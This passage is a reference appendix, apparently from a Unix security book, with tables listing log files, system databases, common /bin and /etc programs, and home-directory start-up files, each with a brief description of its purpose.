/dev/tty*         Terminal devices
/dev/zero         Source of nulls

B.1.2 Log Files

Name                 Description
/etc/utmp            Lists users currently logged into system
/etc/utmpx           Extended utmp file
/etc/wtmp            Records all logins and logouts
/etc/wtmpx           Extended wtmp file
/usr/adm/acct[1]     Records commands executed
/usr/adm/lastlog     Records the last time a user logged in
/usr/adm/messages    Records important messages
/usr/adm/pacct       Accounting for System V (usually)
/usr/adm/saveacct    Records accounting information
/usr/adm/wtmp        Records all logins and logouts

[1] /usr/adm may actually be a link to /var/adm.

B.1.3 System Databases

Name                              Description
/etc/bootparams                   Boot parameters database
/etc/cron/*                       System V start-up files
/etc/defaultdomain                Default NIS domain
/etc/defaultrouter                Default router to which your workstation sends packets destined for other networks
/etc/defaults/su                  Default environment for root after su
/etc/defaults/login               Default environment for login
/etc/dfs/dfstab                   Filesystems to share over NFS (SVR4)
/etc/dialup                       List of dial-up lines
/etc/dumpdates                    Records when a partition was dumped
/etc/d_passwd                     File of dial-up passwords (some systems)
/etc/ethers                       Mapping of Ethernet addresses to IP addresses for RARP
/etc/exports                      NFS exports list (Berkeley-derived systems)
/etc/fbtab                        Login device permissions (SunOS systems)
/etc/filesystems                  List of AIX filesystems the computer supports
/etc/ftpusers                     List of users not allowed to use FTP over the network
/etc/fstab                        Filesystems to mount (Berkeley)
/etc/group                        Denotes membership in groups
/etc/hostnames.xx                 Hostname for interface xx
/etc/hosts                        List of IP hosts and host names
/etc/hosts.allow                  Hosts for which tcpwrapper allows connection
/etc/hosts.deny                   Hosts for which tcpwrapper denies connection
/etc/hosts.equiv                  Lists trusted machines
/etc/hosts.lpd                    Lists machines allowed to print on your computer's printer
/etc/inetd.conf                   Configuration file for /etc/inetd
/etc/init.d/*                     System V start-up files
/etc/inittab                      tty start-up information; controls what happens at various run levels (System V)
/etc/keystore                     Used in SunOS 4.0 to store cryptography keys
/etc/login.access                 Used to control who can log in from where (logdaemon and some more recent BSD systems)
/etc/logindevperm                 Login device permissions (Solaris systems)
/etc/master.passwd                Shadow password file on some BSD systems
/etc/motd                         Message of the day
/etc/mnttab                       Table of mounted devices
/etc/netgroup                     Netgroups file for NIS
/etc/netid                        Netname database
/etc/netstart                     Network configuration for some BSD systems
/etc/nodename                     Name of your computer
/etc/ntp.conf                     NTP configuration file
/etc/nsswitch.conf                For Solaris (files, NIS, NIS+), the order in which system databases for accounts, services, etc., should be read
/etc/passwd                       Users and encrypted passwords
/etc/printcap                     Printer configuration file
/etc/profile                      Default user profile
/etc/publickey                    Computer's public key
/etc/rc*                          Reboot command scripts
/etc/rc?.d/*                      System V start-up files for each run level
/etc/remote                       Modem and telephone-number information for tip
/etc/resolv.conf                  DNS configuration file
/etc/security/*                   Various operating system security files
/etc/security/passwd.adjunct      Shadow-password file for SunOS
/etc/services                     Lists network services
/etc/shadow                       Shadow password file
/etc/shells                       Legal shells for FTP users and for the chsh command
/etc/skeykeys                     Used by S/Key
/etc/socks.conf                   SOCKS configuration file
/etc/syslog.conf                  syslog configuration file
/etc/tftpaccess.ctl               Access to TFTP daemon (AIX systems)
/etc/timezone                     Your time zone
/etc/ttys, /etc/ttytab            Defines active terminals
/etc/utmp                         Lists users currently logged into system
/etc/vfstab                       Filesystems to mount at boot time (SVR4)
/etc/X0.hosts                     Allows access to X0 server
/usr/lib/aliases or /etc/aliases  Lists mail aliases for /usr/lib/sendmail (may be in /etc or /etc/sendmail)
/usr/lib/crontab                  Scheduled execution file
/usr/lib/sendmail.cf              sendmail configuration file
/usr/lib/uucp/Devices             UUCP BNU
/usr/lib/uucp/L.cmds              UUCP Version 2
/usr/lib/uucp/L-devices           UUCP Version 2
/usr/lib/uucp/Permissions         UUCP BNU
/usr/lib/uucp/USERFILE            UUCP Version 2
/var/spool/cron*                  cron files, including cron.allow, cron.deny, at.allow, and at.deny
/var/spool/cron/crontabs/*        Individual user files (System V)

B.1.4 /bin Programs

Some of these programs may be found in other directories, including /usr/bin, /sbin, /usr/sbin, /usr/ccs/bin, and /usr/local/bin.

Name                         Description
adb                          Debugger; also can be used to edit the kernel
cc                           C compiler
cd, chdir                    Built-in shell command
chgrp                        Changes group of files
chmod                        Changes permissions of files
chown                        Changes owner of files
chsh                         Changes a user's shell
cp                           Copies files
crypt                        Encrypts files
csh                          C-shell command interpreter
cu                           Places telephone calls
dbx                          Debugger
des                          DES encryption/decryption program
ex3.7preserve, ex3.7recover  vi buffer recovery programs
find                         Finds files
finger                       Prints information about users
fsirand                      Randomizes i-node numbers on a disk
ftp                          Transfers files on a network
gcore                        Gets a core file for a running process
kill                         Kills processes
kinit                        Authenticates to Kerberos
ksh                          Korn-shell command interpreter
last                         Prints when users logged on
lastcomm                     Prints what commands were run
limit                        Changes process limits
login                        Logs a user into the system
ls                           Lists files
mail                         Sends mail
netstat                      Prints status of network
newgrp                       Changes your group
perl, suidperl, taintperl    System administration and programming language. suidperl has special provisions for SUID programs; taintperl has special data-tainting features
passwd                       Changes passwords
ps                           Displays processes
pwd                          Prints your working directory
renice                       Changes the priority of a process
rlogin                       Logs you into another machine
rsh, krsh, rksh              Restricted shells (System V)
rsh                          Remote shell (named remsh on System V)
sh                           Bourne-shell command interpreter
strings                      Prints the strings in a file
su                           Become the superuser, or change your current user ID
sysadmsh                     System administrator's shell
telnet                       Becomes a terminal on another machine
tip                          Calls another machine
umask                        Changes your umask (shell built-in)
users                        Prints users logged in
uucheck                      Checks UUCP security
uucico                       Transfers UUCP files
uucp                         Queues files for transfer by UUCP
uudecode                     Decodes uu-encoded files
uux                          Queues programs for execution by UUCP
w                            Prints what people are doing
who                          Prints who is logged in
write                        Prints messages on another's terminal
xhost                        Allows other hosts to access your X Window server
XScreensaver                 Clears and locks an X screen
yppasswd                     Changes your NIS password

B.1.5 /etc Programs

The following programs are typically placed in the /etc, /sbin, /usr/sbin, or /usr/etc directories.

Name                     Description
accton                   Turns on accounting
arp                      Address resolution protocol
comsat                   Alerts to incoming mail
dmesg                    Prints messages from system boot
exportfs                 Exports a filesystem (Berkeley)
fingerd or in.fingerd    Finger daemon
ftpd or in.ftpd          FTP daemon
fsck                     Filesystem-consistency checker
getty                    Prints login:
inetd                    Internet daemon
init                     First program to run
lockd                    Lock daemon
lpc                      Line-printer control
makekey                  Runs crypt() library routine (in /usr/lib)
mount                    Mounts partitions
ntalkd                   Talk daemon
ping                     Network test program
rc?                      Boot scripts
rc?.d                    Directories containing boot scripts
rdump                    Remote dump program
renice                   Changes priority of programs
rexecd or in.rexecd      Remote execution daemon
rlogind or in.rlogind    Remote login daemon
routed                   Route daemon
rshd                     Remote shell daemon
sa                       Processes accounting logs
sendmail                 Network mailer program (may be in /lib or /lib/sendmail)
share                    Exports a filesystem (SVR4)
showmount                Shows clients that have mounted a filesystem
sockd                    SOCKS daemon
syslogd                  System log daemon
talkd or in.talkd        Talk daemon
tcpd                     TCP wrapper
telnetd or in.telnetd    Telnet daemon
tftpd or in.tftpd        TFTP daemon
ttymon                   Monitors terminal ports
uucpd                    UUCP over TCP/IP daemon
yp/makedbm               Makes an NIS database

B.2 Important Files in Your Home Directory

Name                                       Description
.cshrc                                     C-shell initialization command; run at each csh invocation
.emacs                                     Start-up file for GNU Emacs
.exrc                                      Start-up commands for ex and vi editors
.forward                                   Contains an address that tells /usr/lib/sendmail where to forward your electronic mail
.history                                   C-shell history
.kshrc                                     Korn shell start-up file
.login                                     C-shell initialization command script; run only on login
.logout                                    C-shell commands executed automatically on logout
.mailrc                                    Mail start-up file
.netrc                                     Initialization and macros for FTP
.procmailrc                                Commands and macros for procmail mail agent
.profile                                   Bourne- and Korn-shell initialization commands
.rhosts                                    Contains the names of the remote accounts that can log into your account via rsh and rlogin without providing a password
.XDefaults, .Xinit, .XResource, .Xsession  X Window System start-up files
.xinitrc                                   Start-up file for xinit

